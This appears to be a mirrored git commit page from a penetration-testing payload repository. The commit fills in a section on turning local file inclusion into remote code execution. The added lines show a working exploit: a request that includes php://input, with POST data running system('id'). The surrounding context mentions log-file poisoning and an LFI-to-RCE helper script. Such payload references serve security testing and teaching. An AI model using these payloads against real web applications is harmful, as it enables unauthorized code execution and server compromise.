mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-04-20 05:53:18 +02:00
LFI to RCE via input:// stream
This commit is contained in:
Swissky
parent
3e6043be32
commit
87ef554e40
1 changed files with 5 additions and 5 deletions
|
|
@ -117,11 +117,11 @@ Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/down
|
|||
|
||||
|
||||
## LFI to RCE via input:// stream
|
||||
TODO
|
||||
file=php://input
|
||||
(specify your payload in the POST parameters,
|
||||
|
||||
|
||||
Specify your payload in the POST parameters
|
||||
```
|
||||
http://example.com/index.php?page=php://input
|
||||
POST DATA: <? system('id'); ?>
|
||||
```
|
||||
|
||||
## LFI to RCE via controlled log file
|
||||
Just append your PHP code into the log file and include it.
|
||||
|
|
|
|||
Loading…
Reference in a new issue